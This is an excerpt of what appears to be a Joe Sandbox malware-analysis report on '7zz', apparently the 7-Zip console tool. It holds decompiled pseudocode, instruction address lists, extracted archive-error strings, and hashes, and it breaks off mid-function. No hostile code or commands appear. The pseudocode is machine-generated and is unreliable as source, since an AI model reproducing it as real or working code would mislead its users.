							if(_t757 != 0) {
								 *((intOrPtr*)( *_t757 + 8))(_t757);
							}
							 *(_t1081 - 4) = 3;
							E00406E46(_t1081 - 0x7c);
							 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
							E00405233(_t1081 - 0x2d8, __eflags);
							 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
							 *(_t1081 - 4) = 0xa;
							_t1075 = 0;
							goto L53;
						}
					} else {
						E004051E3(0x490ab8, 1);
						 *(_t1081 - 4) = 3;
						E00406E46(_t1081 - 0x7c);
						 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
						E00405233(_t1081 - 0x2d8, __eflags);
						 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
						 *(_t1081 - 4) = 5;
						goto L53;
					}
				} else {
					E004051E3(0x490ab8, 1);
					 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
					 *(_t1081 - 4) = 2;
					L53:
					E0040862D();
					 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
					E00408604(_t1081 - 0x4c);
					_t554 = _t1075;
					L110:
					 *[fs:0x0] =  *((intOrPtr*)(_t1081 - 0xc));
					return _t554;
				}
			}

0x00403a75
0x00403a7a
0x00403a80
0x00403a83
0x00403a8c
0x00403a96
0x00403a99
0x00403a9b
0x00403aa8
0x00403aad
0x00403ab3
0x00403ab7
0x00403abc
0x00403ac3
0x00403acd
0x00403af0
0x00403afb
0x00403b03
0x00403b07
0x00403b15
0x00403b19
0x00403b1a
0x00403b1e
0x00403b23
0x00403b2a
0x00403b62
0x00403b69
0x00403b6b
0x00403b72
0x00403b72
0x00403b77
0x00403b7e
0x00403b83
0x00403b85
0x00403b85
0x00403b8a
0x00403b91
0x00403b97
0x00403b99
0x00403b99
0x00403b9d
0x00403b9d
0x00403bab
0x00403bac
0x00403bb1
0x00403bb3
0x00403bb9
0x00403bbc
0x00403bbe
0x00403bc2
0x00403bcf
0x00403bcf
0x00403bc4
0x00403bcb
0x00403bcb
0x00403bd1
0x00403bd3
0x00403bd6
0x00403bda
0x00403be0
0x00403be5
0x00403be5
0x00403bea
0x00403bee
0x00403bf3
0x00403bf5
0x00403bf7
0x00403c03
0x00403c03
0x00403c0e
0x00403c13
0x00403c16
0x00403c19
0x00403c1b
0x00403c1d
0x00403c37
0x00403c37
0x00403c41
0x00403c48
0x00403c1f
0x00403c1f
0x00403c26
0x00000000
0x00403c28
0x00403c2e
0x00403c33
0x00403c35
0x00000000
0x00000000
0x00403c35
0x00403c26
0x00403c1d
0x00403c4d
0x00403c52
0x00403c57
0x00403c63
0x00403c6a
0x00403c6b
0x00403c6f
0x00403c74
0x00403c76
0x00403c78
0x00403c82
0x00403c89
0x00403c89
0x00403c8e
0x00403c95
0x00403ecc
0x00403ed3
0x0040400d
0x0040400d
0x00404011
0x00404572
0x00404574
0x0040457a
0x0040457d
0x0040457f
0x00404583
0x00404590
0x00404590
0x00404585
0x0040458c
0x0040458c
0x00404592
0x00404594
0x00404598
0x0040459b
0x004045a0
0x004045a0
0x004045a3
0x004045ac
0x004045b6
0x004045b9
0x004045bd
0x004045ca
0x004045cd
0x004045d0
0x004045d3
0x004045d6
0x004045d9
0x004045dc
0x004045df
0x004045e2
0x004045f3
0x00404600
0x00404604
0x0040460a
0x00404615
0x0040461a
0x00404626
0x0040462a
0x00404630
0x00404636
0x0040463b
0x00404642
0x00404651
0x0040465d
0x0040466a
0x0040467b
0x00404687
0x0040468d
0x0040469e
0x0040469f
0x004046a7
0x004046ac
0x004046af
0x004046b2
0x004046c3
0x004046c9
0x004046d0
0x004046d1
0x004046db
0x004046dc
0x004046e3
0x004046e7
0x004046f1
0x004046f5
0x004046fa
0x004046fe
0x00404701
0x00404706
0x00404708
0x00404721
0x00404726
0x0040472a
0x0040472c
0x0040472c
0x0040472a
0x00404736
0x0040473b
0x0040473e
0x00404741
0x00404743
0x0040474a
0x00404762
0x00404745
0x00404745
0x00404748
0x00000000
0x00000000
0x00404748
0x0040476a
0x0040476d
0x004048d7
0x004048d7
0x004048db
0x004048e3
0x004048e6
0x004048eb
0x004048ee
0x004048f3
0x004048f5
0x0040490f
0x0040490f
0x00404914
0x00404917
0x0040491c
0x0040491e
0x00404938
0x00404938
0x004048dd
0x004048dd
0x004048e1
0x00000000
0x00000000
0x004048e1
0x0040493d
0x00404941
0x0040494b
0x00404952
0x00404952
0x0040495a
0x00404960
0x0040496a
0x00404975
0x0040497a
0x0040497d
0x00404981
0x00404986
0x00404986
0x0040498c
0x00404990
0x00404995
0x00404998
0x0040499c
0x0040499e
0x004049a3
0x004049a3
0x004049a9
0x004049ad
0x004049b2
0x004049bc
0x004049c1
0x004049c8
0x00000000
0x00404773
0x00404776
0x00404779
0x00000000
0x0040477f
0x0040477f
0x00404783
0x0040478d
0x00404794
0x00404794
0x00404799
0x004047a1
0x004047a7
0x004047bf
0x004047c6
0x004047cb
0x004047cb
0x004047d1
0x004047d8
0x004047eb
0x00404806
0x0040480d
0x004047da
0x004047da
0x004047e1
0x00000000
0x004047e3
0x004047e3
0x004047e9
0x00000000
0x00000000
0x004047e9
0x004047e1
0x0040483f
0x00404854
0x0040485b
0x00404860
0x00404867
0x00404875
0x00404897
0x00404897
0x0040489f
0x004048a5
0x004048af
0x004048ba
0x004048bf
0x004048c2
0x004048c6
0x004048cf
0x004048cf
0x00000000
0x004048c6
0x00404779
0x00000000
0x00404017
0x00404017
0x0040401e
0x004049dd
0x004049e4
0x004049eb
0x004049ec
0x004049ef
0x004049f5
0x004049fd
0x00404a06
0x00404a08
0x00404a0f
0x00404a16
0x00404a17
0x00404a1d
0x00404a22
0x00404a25
0x00404a30
0x00404a53
0x00404a5b
0x00404a5f
0x00404a64
0x00404a66
0x00404a6a
0x00404a6f
0x00404a6f
0x00404a75
0x00404a79
0x00404a7e
0x00404a7e
0x00404a7e
0x00404a88
0x00404a8d
0x00404a94
0x00000000
0x00404a27
0x00404a27
0x00404a2a
0x00404ab7
0x00404ab9
0x00000000
0x00404abf
0x00404abf
0x00404acb
0x00404ad0
0x00404ad2
0x00404ad4
0x00404ad7
0x00404ada
0x00404ae1
0x00404ae4
0x00404aea
0x00404aea
0x00000000
0x00000000
0x00000000
0x00404a2a
0x00404024
0x0040402a
0x0040402f
0x00404031
0x00404502
0x00000000
0x00404037
0x00404037
0x0040403e
0x00404040
0x00404046
0x00404054
0x00404054
0x00404046
0x0040405f
0x00404064
0x0040406b
0x0040406f
0x00404075
0x00404085
0x00404085
0x00404085
0x00404085
0x00404077
0x00404077
0x0040407d
0x00000000
0x0040407f
0x0040407f
0x0040407f
0x0040407d
0x00404092
0x0040409f
0x004040aa
0x004040b5
0x004040bc
0x004040c5
0x004040c9
0x004040cf
0x004040e2
0x004040e2
0x004040e2
0x004040e2
0x004040d1
0x004040d1
0x004040d7
0x00000000
0x004040d9
0x004040d9
0x004040d9
0x004040d7
0x004040f6
0x00404108
0x0040410e
0x00404119
0x0040412a
0x0040412e
0x0040412f
0x00404130
0x00404134
0x00404139
0x0040413b
0x0040413d
0x00404147
0x0040414e
0x0040414e
0x00404159
0x0040415f
0x00404166
0x0040416d
0x00404174
0x00404177
0x0040417c
0x00404180
0x00404187
0x0040418a
0x0040418f
0x00404198
0x004041b4
0x004041b9
0x004041bf
0x004041c1
0x004041c3
0x004041c6
0x004041c8
0x004041ce
0x004041e2
0x004041f0
0x004041f3
0x004041fa
0x004041fe
0x00404209
0x0040420e
0x00404215
0x0040421a
0x0040421c
0x0040421c
0x004041c8
0x00404230
0x00404252
0x00404259
0x0040425a
0x0040425d
0x00404266
0x00404266
0x0040426e
0x00404273
0x00404276
0x00404276
0x00404279
0x0040427d
0x00404283
0x0040428a
0x0040428d
0x00404290
0x00404293
0x00404298
0x0040429e
0x004042a2
0x004042a7
0x004042b3
0x004042bc
0x004042bc
0x004042c1
0x004042c7
0x004042d3
0x004042dc
0x004042dc
0x004042e1
0x004042e7
0x004042f3
0x004042fc
0x004042fc
0x00404301
0x00404307
0x00404309
0x0040430e
0x00404317
0x0040431b
0x00404320
0x00404327
0x00404331
0x00404331
0x00404336
0x00404339
0x0040433b
0x00404340
0x0040434c
0x0040434c
0x00404360
0x00404360
0x00404365
0x0040436b
0x0040436d
0x00404370
0x0040439b
0x004043b7
0x004043bc
0x004043be
0x004043c1
0x004043c3
0x004043c9
0x004043dd
0x004043ee
0x004043f1
0x004043f8
0x004043fc
0x00404407
0x0040440c
0x00404416
0x0040441b
0x0040441d
0x0040441d
0x004043c3
0x00404431
0x00404453
0x0040445a
0x0040445b
0x0040445e
0x00404467
0x00404467
0x0040446f
0x00404474
0x00404477
0x00404372
0x00404372
0x00404378
0x0040438e
0x0040438e
0x00404378
0x00404480
0x00404484
0x0040448f
0x00404493
0x0040449e
0x004044a4
0x004044ab
0x004044b0
0x004044b2
0x004044b6
0x004044bb
0x004044bb
0x004044c1
0x004044c5
0x004044ca
0x004044d4
0x004044d9
0x004044e3
0x004044ea
0x004044ef
0x004044f6
0x004044fb
0x004044fb
0x00000000
0x00404031
0x0040401e
0x00403ed9
0x00403ee4
0x00403ee9
0x00403ee9
0x00403eec
0x00403ef2
0x00403ef8
0x00403efa
0x00403f00
0x00403f96
0x00403f96
0x00403f9b
0x00403f9d
0x00000000
0x00403fa3
0x00403fa3
0x00403fa6
0x00403ffc
0x00404008
0x00000000
0x00403fa8
0x00403faf
0x00403fb7
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fc6
0x00403fcb
0x00403fcb
0x00403fd1
0x00403fd5
0x00403fda
0x00403fe4
0x00403fe9
0x00403ff0
0x00404a9b
0x00404a9e
0x00404aa3
0x00404aaa
0x00404ab1
0x00000000
0x00404ab1
0x00403fa6
0x00403f06
0x00403f06
0x00403f0b
0x00403f0d
0x00404507
0x0040450a
0x0040450e
0x00404513
0x00404516
0x0040451a
0x0040451c
0x00404521
0x00404521
0x00404527
0x0040452b
0x00404530
0x0040453a
0x0040453f
0x00404549
0x00404550
0x00404555
0x0040455c
0x00404561
0x00404561
0x00000000
0x00403f13
0x00403f13
0x00403f16
0x00403f85
0x00403f91
0x00000000
0x00403f18
0x00403f1f
0x00403f27
0x00403f2b
0x00403f30
0x00403f32
0x00403f36
0x00403f3b
0x00403f3b
0x00403f41
0x00403f45
0x00403f4a
0x00403f4a
0x00403f4a
0x00403f54
0x00403f59
0x00403f62
0x00403f69
0x00000000
0x00403f69
0x00403f16
0x00403f0d
0x00403f00
0x00403c9b
0x00403c9b
0x00403cb7
0x00403cbf
0x00403cc3
0x00403cc5
0x00403ccb
0x00403cd9
0x00403cde
0x00403ce7
0x00403cec
0x00403cfc
0x00403d01
0x00403d12
0x00403d1e
0x00403d23
0x00403d2a
0x00403d36
0x00403d42
0x00403d45
0x00403d48
0x00403d4b
0x00403d50
0x00403d54
0x00403d58
0x00403d5c
0x00403d5e
0x00403d6b
0x00403d6e
0x00403d76
0x00403d7a
0x00403d84
0x00403d8f
0x00403d93
0x00403d9d
0x00403d9d
0x00403da7
0x00403dac
0x00403db2
0x00403db2
0x00403d5e
0x00403dbe
0x00403dca
0x00403dcf
0x00403dd3
0x00403dd7
0x00403dd9
0x00403ddf
0x00403de2
0x00403de4
0x00403de7
0x00403df2
0x00403df2
0x00403df5
0x00403df7
0x00403dfa
0x00403e01
0x00403e01
0x00403dfc
0x00403dfc
0x00403dfc
0x00403e07
0x00403e0f
0x00403e11
0x00403e13
0x00403e16
0x00403e1d
0x00403e1d
0x00403e18
0x00403e18
0x00403e18
0x00403e20
0x00403de9
0x00403de9
0x00403deb
0x00000000
0x00403ded
0x00403ded
0x00403ded
0x00403deb
0x00403e23
0x00403e2c
0x00403e31
0x00403e37
0x00403e37
0x00403dd9
0x00403e3f
0x00403e44
0x00403e4b
0x00403e50
0x00403e53
0x00403e5a
0x00403e5a
0x00403ccb
0x00403e7a
0x00403e82
0x00403e86
0x00403e8b
0x00403e8e
0x00403e92
0x00403e94
0x00403e99
0x00403e99
0x00403e9f
0x00403ea3
0x00403ea8
0x00403eb2
0x00403eb7
0x00403ebe
0x00403ec5
0x00000000
0x00403ec5
0x00403b2c
0x00403b33
0x00403b3b
0x00403b3f
0x00403b44
0x00403b4e
0x00403b53
0x00403b56
0x00000000
0x00403b56
0x00403acf
0x00403ad6
0x00403adb
0x00403ade
0x00403f6a
0x00403f6d
0x00403f72
0x00403f79
0x00403f7e
0x00404563
0x00404569
0x00404571
0x00404571

APIs

__EH_prolog.LIBCMT ref: 00403A75
SetFileApisToOEM.KERNEL32 ref: 00403A83
GetCommandLineW.KERNEL32 ref: 00403A9E

Part of subcall function 00406C53: __EH_prolog.LIBCMT ref: 00406C58

Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922

Part of subcall function 00407CEC: __EH_prolog.LIBCMT ref: 00407CF1

Part of subcall function 00404B09: __EH_prolog.LIBCMT ref: 00404B0E

Part of subcall function 00405233: __EH_prolog.LIBCMT ref: 00405238

Strings

Errors: , xrefs: 00404A3B
WARNING: Cannot find , xrefs: 0040423F
Archives: , xrefs: 0040474D
CRC Error, xrefs: 00403F18
Compressed: , xrefs: 00404821
WARNING: Cannot open , xrefs: 00404440
Folders: , xrefs: 004047B3
CRC, xrefs: 00403EDF
Files: , xrefs: 004047FA
Decoding Error, xrefs: 00403FA8
Codecs:, xrefs: 00403E64
CRC: , xrefs: 00404884
Size: , xrefs: 00404833
Formats:, xrefs: 00403CA3
59@, xrefs: 00403A91, 00403EB7, 00403F59, 00403FE9, 004044D9, 0040453F, 004049C1, 00404A8D
WARNINGS for files:, xrefs: 004041A1, 004043A4
: , xrefs: 004041CE, 004043C9
Error:, xrefs: 00404340
----------------, xrefs: 00404222, 00404423
Error: , xrefs: 0040470D
Sub items Errors: , xrefs: 00404923
file, xrefs: 00404237, 00404438
Archive Errors: , xrefs: 004048FA

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$ApisCommandExceptionFileLineRaise
String ID: CRC Error$Decoding Error$Error:$ : $ file$----------------$59@$Archive Errors: $Archives: $CRC$CRC: $Codecs:$Compressed: $Error: $Errors: $Files: $Folders: $Formats:$Size: $Sub items Errors: $WARNING: Cannot find $WARNING: Cannot open $WARNINGS for files:
API String ID: 3088770371-3134536549
Opcode ID: 111baba5f42da8ba9aa8a8c19e39f95d8ac119f90839705df92361c15f00354f
Instruction ID: 0e9785898952d904cddb7e6f0fb348193d980c7c6074724112ac217821b8bdc4
Opcode Fuzzy Hash: 111baba5f42da8ba9aa8a8c19e39f95d8ac119f90839705df92361c15f00354f
Instruction Fuzzy Hash: F0A28D70E042199ADF14EBA5C855BEEBBB4AF54308F1044BFE105B72C2DB785E84CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00417BAE Relevance: 23.5, APIs: 1, Strings: 12, Instructions: 710
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00417BAE(intOrPtr __ecx) {
				intOrPtr* _t349;
				signed int _t353;
				intOrPtr _t355;
				void* _t356;
				signed int _t358;
				signed int _t359;
				signed int _t364;
				signed int _t371;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t384;
				signed int _t385;
				signed int _t391;
				void* _t393;
				signed int _t396;
				void* _t402;
				char* _t407;
				signed int _t409;
				signed int _t411;
				signed int _t414;
				signed int _t426;
				intOrPtr* _t428;
				void* _t433;
				void* _t437;
				signed int _t440;
				signed int _t441;
				signed int _t449;
				intOrPtr _t457;
				signed int _t462;
				intOrPtr _t463;
				intOrPtr _t465;
				void* _t472;
				intOrPtr _t479;
				signed int _t484;
				signed int _t486;
				void* _t489;
				signed int _t495;
				signed int _t496;
				intOrPtr _t498;
				signed int _t499;
				signed int _t500;
				char* _t502;
				intOrPtr _t536;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t582;
				void* _t587;
				intOrPtr _t591;
				signed int _t594;
				intOrPtr _t607;
				signed int _t619;
				signed int _t627;
				signed int _t629;
				char* _t641;
				signed char* _t645;
				intOrPtr _t647;
				signed int _t650;
				signed int _t652;
				intOrPtr _t653;
				void* _t657;
				void* _t659;
				intOrPtr _t660;
				signed int _t663;
				signed int _t666;
				void* _t667;
				void* _t669;
				intOrPtr* _t670;

				E0046B890(E00474DC3, _t667);
				_t670 = _t669 - 0x17c;
				_t647 = __ecx;
				_t641 = 0;
				 *((intOrPtr*)(_t667 - 0x74)) = __ecx;
				_t349 =  *((intOrPtr*)(__ecx));
				if(_t349 != 0) {
					 *((intOrPtr*)( *_t349 + 8))(_t349);
					 *((intOrPtr*)(__ecx)) = 0;
				}
				 *(_t647 + 0x34) = _t641;
				 *( *(_t647 + 0x30)) = _t641;
				E00408963(_t647 + 4);
				 *(_t667 - 4) = _t641;
				 *(_t667 - 0x48) = _t641;
				 *(_t667 - 0x44) = _t641;
				 *(_t667 - 0x40) = _t641;
				E00401E9A(_t667 - 0x48, 3);
				_t353 =  *(_t667 - 0x68);
				 *(_t667 - 4) = 1;
				if(_t353 == _t641) {
					L11:
					E00404AD0(_t667 - 0x34, 4);
					 *((intOrPtr*)(_t667 - 0x34)) = 0x47a668;
					__eflags =  *(_t667 + 0xc) - _t641;
					 *(_t667 - 4) = 3;
					if( *(_t667 + 0xc) < _t641) {
						_t355 =  *((intOrPtr*)(_t667 + 8));
						_t495 = 0;
						 *(_t667 + 0xc) = _t641;
						__eflags =  *((intOrPtr*)(_t355 + 0x10)) - _t641;
						if( *((intOrPtr*)(_t355 + 0x10)) <= _t641) {
							L18:
							__eflags =  *(_t667 + 0x10) - _t641;
							if( *(_t667 + 0x10) != _t641) {
								L21:
								__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
								if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
									L64:
									_t356 = E00408053( *(_t667 - 0x48), L"000");
									__eflags = _t356 - _t641;
									if(_t356 == _t641) {
										L66:
										 *(_t667 - 0x14) = _t641;
										 *(_t667 - 0x10) = _t641;
										 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
										 *(_t667 - 4) = 7;
										E0040FA26(_t667 - 0x18, 0x400);
										_t358 =  *(_t667 + 0x10);
										_t496 =  *(_t667 - 0x10);
										_t359 =  *((intOrPtr*)( *_t358 + 0x10))(_t358, _t641, _t641, _t641, _t641);
										__eflags = _t359 - _t641;
										if(_t359 != _t641) {
											L68:
											_t650 = _t359;
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											E00407A18( *(_t667 - 0x10));
											L127:
											 *(_t667 - 4) = 1;
											E00408604(_t667 - 0x34);
											E00407A18( *(_t667 - 0x48));
											E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
											_t364 = _t650;
											L33:
											 *[fs:0x0] =  *((intOrPtr*)(_t667 - 0xc));
											return _t364;
										}
										 *(_t667 + 0xc) = 0x400;
										_t359 = E0040FA74( *(_t667 + 0x10), _t496, _t667 + 0xc);
										__eflags = _t359 - _t641;
										if(_t359 == _t641) {
											__eflags =  *(_t667 + 0xc) - 0x10;
											if( *(_t667 + 0xc) < 0x10) {
												L80:
												 *(_t667 - 4) = 3;
												 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
												E00407A18( *(_t667 - 0x10));
												L81:
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
												if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
													L92:
													__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
													 *(_t667 - 0x20) = _t641;
													if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
														L32:
														 *(_t667 - 4) = 1;
														E00408604(_t667 - 0x34);
														E00407A18( *(_t667 - 0x48));
														E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
														_t364 = 1;
														goto L33;
													}
													_t498 =  *((intOrPtr*)(_t667 - 0x74));
													__eflags = 0;
													do {
														_t652 =  *(_t667 + 0x10);
														__eflags = _t652;
														if(_t652 == 0) {
															L96:
															 *(_t667 + 0xc) = 0;
															 *(_t667 - 4) = 0xa;
															_t371 =  *( *(_t667 - 0x28) +  *(_t667 - 0x20) * 4);
															 *(_t498 + 0x1c) = _t371;
															E0040C9B4(_t667 + 0xc,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) + _t371 * 4)) + 4))());
															_t375 =  *(_t667 + 0xc);
															__eflags = _t375;
															if(_t375 != 0) {
																__eflags = _t652;
																if(_t652 == 0) {
																	 *(_t667 - 0x3c) = 0;
																	 *(_t667 - 4) = 0xb;
																	 *((intOrPtr*)( *_t375))(_t375, 0x47a5b8, _t667 - 0x3c);
																	_t377 =  *(_t667 - 0x3c);
																	__eflags = _t377;
																	if(_t377 == 0) {
																		_t378 =  *(_t667 + 0xc);
																		 *(_t667 - 4) = 3;
																		__eflags = _t378;
																		if(_t378 != 0) {
																			 *((intOrPtr*)( *_t378 + 8))(_t378);
																		}
																		L111:
																		 *(_t667 - 4) = 1;
																		E00408604(_t667 - 0x34);
																		E00407A18( *(_t667 - 0x48));
																		E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
																		_t364 = 0x80004001;
																		goto L33;
																	}
																	_t650 =  *((intOrPtr*)( *_t377 + 0xc))(_t377,  *((intOrPtr*)(_t667 + 0x14)));
																	_t384 =  *(_t667 - 0x3c);
																	__eflags = _t384;
																	 *(_t667 - 4) = 0xa;
																	if(_t384 != 0) {
																		 *((intOrPtr*)( *_t384 + 8))(_t384);
																	}
																	L103:
																	__eflags = _t650 - 1;
																	if(_t650 != 1) {
																		__eflags = _t650;
																		if(_t650 == 0) {
																			 *(_t667 - 0x1c) = 0;
																			 *((short*)(_t667 - 0x1a)) = 0;
																			_t385 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 0xc;
																			 *((intOrPtr*)( *_t385 + 0x20))(_t385, 0x37, _t667 - 0x1c);
																			__eflags =  *(_t667 - 0x1c);
																			if( *(_t667 - 0x1c) != 0) {
																				__eflags =  *(_t667 - 0x1c) - 8;
																				_t407 =  *(_t667 - 0x14);
																				if( *(_t667 - 0x1c) != 8) {
																					_t407 = L"Unknown error";
																				}
																				E00403593(_t498 + 0x30, _t407);
																			}
																			 *(_t667 - 4) = 0xa;
																			E0040C20F(_t667 - 0x1c);
																			E0040C9B4(_t498,  *(_t667 + 0xc));
																			_t653 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t667 + 8)) + 0x14)) +  *(_t498 + 0x1c) * 4));
																			__eflags =  *(_t653 + 0x20);
																			if( *(_t653 + 0x20) != 0) {
																				_t391 = E0041761D(_t653, _t667 - 0x48);
																				__eflags = _t391;
																				if(_t391 < 0) {
																					_t391 = 0;
																					__eflags = 0;
																				}
																				_t536 =  *((intOrPtr*)(_t653 + 0x24));
																				_t335 =  *((intOrPtr*)(_t536 + _t391 * 4)) + 0xc; // 0xc
																				_push( *((intOrPtr*)(_t536 + _t391 * 4)));
																				_t393 = E00414F74(_t667 - 0x18, _t667 - 0x6c);
																				 *(_t667 - 4) = 0x10;
																				E00401E26(_t498 + 0x10, _t393);
																				E00407A18( *((intOrPtr*)(_t667 - 0x18)));
																			} else {
																				E00403532(_t667 - 0x60, 0x490a74);
																				 *(_t667 - 4) = 0xd;
																				E00403532(_t667 - 0x18, 0x490a74);
																				_push(_t667 - 0x60);
																				_push(_t667 - 0x18);
																				 *(_t667 - 4) = 0xe;
																				_t402 = E00414F74(_t667 - 0x54, _t667 - 0x6c);
																				 *(_t667 - 4) = 0xf;
																				E00401E26(_t498 + 0x10, _t402);
																				E00407A18( *((intOrPtr*)(_t667 - 0x54)));
																				E00407A18( *((intOrPtr*)(_t667 - 0x18)));
																				E00407A18( *((intOrPtr*)(_t667 - 0x60)));
																			}
																			_t396 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 3;
																			__eflags = _t396;
																			if(_t396 != 0) {
																				 *((intOrPtr*)( *_t396 + 8))(_t396);
																			}
																			_t650 = 0;
																			__eflags = 0;
																		} else {
																			_t409 =  *(_t667 + 0xc);
																			 *(_t667 - 4) = 3;
																			__eflags = _t409;
																			if(_t409 != 0) {
																				 *((intOrPtr*)( *_t409 + 8))(_t409);
																			}
																		}
																		goto L127;
																	}
																	_t411 =  *(_t667 + 0xc);
																	 *(_t667 - 4) = 3;
																	__eflags = _t411;
																	if(_t411 != 0) {
																		 *((intOrPtr*)( *_t411 + 8))(_t411);
																	}
																	goto L106;
																}
																_t650 =  *((intOrPtr*)( *_t375 + 0xc))(_t375,  *(_t667 + 0x10), 0x47ab88,  *((intOrPtr*)(_t667 + 0x18)));
																goto L103;
															}
															 *(_t667 - 4) = 3;
															goto L106;
														}
														_t414 =  *((intOrPtr*)( *_t652 + 0x10))(_t652, 0, 0, 0, 0);
														__eflags = _t414;
														if(_t414 != 0) {
															_t650 = _t414;
															goto L127;
														}
														goto L96;
														L106:
														 *(_t667 - 0x20) =  *(_t667 - 0x20) + 1;
														__eflags =  *(_t667 - 0x20) -  *((intOrPtr*)(_t667 - 0x2c));
													} while ( *(_t667 - 0x20) <  *((intOrPtr*)(_t667 - 0x2c)));
													goto L32;
												}
												E00403532(_t667 - 0x18, L"iso");
												 *(_t667 - 4) = 8;
												 *(_t667 - 0x38) = E00417689( *((intOrPtr*)(_t667 + 8)), _t667 - 0x18);
												 *(_t667 - 4) = 3;
												E00407A18( *((intOrPtr*)(_t667 - 0x18)));
												 *_t670 = L"udf";
												E00403532(_t667 - 0x18);
												 *(_t667 - 4) = 9;
												 *(_t667 - 0x4c) = E00417689( *((intOrPtr*)(_t667 + 8)), _t667 - 0x18);
												 *(_t667 - 4) = 3;
												E00407A18( *((intOrPtr*)(_t667 - 0x18)));
												_pop(_t555);
												_t619 = 0;
												_t556 = _t555 | 0xffffffff;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												_t426 = _t556;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													goto L92;
												}
												 *(_t667 + 0xc) =  *(_t667 - 0x28);
												do {
													_t657 =  *( *(_t667 + 0xc));
													__eflags = _t657 -  *(_t667 - 0x38);
													if(_t657 ==  *(_t667 - 0x38)) {
														_t426 = _t619;
													}
													_t499 =  *(_t667 - 0x4c);
													__eflags = _t657 - _t499;
													if(_t657 == _t499) {
														_t556 = _t619;
													}
													 *(_t667 + 0xc) =  *(_t667 + 0xc) + 4;
													_t619 = _t619 + 1;
													__eflags = _t619 -  *((intOrPtr*)(_t667 - 0x2c));
												} while (_t619 <  *((intOrPtr*)(_t667 - 0x2c)));
												__eflags = _t556 - _t426;
												if(_t556 > _t426) {
													__eflags = _t426 - _t641;
													if(_t426 >= _t641) {
														 *( *(_t667 - 0x28) + _t556 * 4) =  *(_t667 - 0x38);
														 *( *(_t667 - 0x28) + _t426 * 4) = _t499;
													}
												}
												goto L92;
											}
											 *(_t667 - 0x4a) =  *(_t667 - 0x4a) & 0x00000000;
											_t659 = 0;
											 *((char*)(_t667 - 0x50)) = 0x52;
											 *((char*)(_t667 - 0x4f)) = 0x61;
											 *((char*)(_t667 - 0x4e)) = 0x72;
											 *((char*)(_t667 - 0x4d)) = 0x21;
											 *(_t667 - 0x4c) = 0x1a;
											 *((char*)(_t667 - 0x4b)) = 7;
											_t559 = _t496 - _t667 - 0x50;
											__eflags = _t559;
											while(1) {
												_t428 = _t667 + _t659 - 0x50;
												__eflags =  *((intOrPtr*)(_t559 + _t428)) -  *_t428;
												if( *((intOrPtr*)(_t559 + _t428)) !=  *_t428) {
													goto L80;
												}
												_t659 = _t659 + 1;
												__eflags = _t659 - 7;
												if(_t659 < 7) {
													continue;
												}
												__eflags =  *((char*)(_t496 + 9)) - 0x73;
												if( *((char*)(_t496 + 9)) != 0x73) {
													goto L80;
												}
												__eflags =  *(_t496 + 0xa) & 0x00000001;
												if(( *(_t496 + 0xa) & 0x00000001) == 0) {
													goto L80;
												}
												_t500 = 0;
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
												if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
													goto L80;
												} else {
													goto L76;
												}
												while(1) {
													L76:
													_t660 =  *((intOrPtr*)( *(_t667 - 0x28) + _t500 * 4));
													_t433 = E0040807A(L"rar");
													__eflags = _t433 - _t641;
													if(_t433 == _t641) {
														break;
													}
													_t500 = _t500 + 1;
													__eflags = _t500 -  *((intOrPtr*)(_t667 - 0x2c));
													if(_t500 <  *((intOrPtr*)(_t667 - 0x2c))) {
														continue;
													}
													goto L80;
												}
												E00408784(_t667 - 0x34, _t500, 1);
												E00408767(_t667 - 0x34, __eflags, _t641);
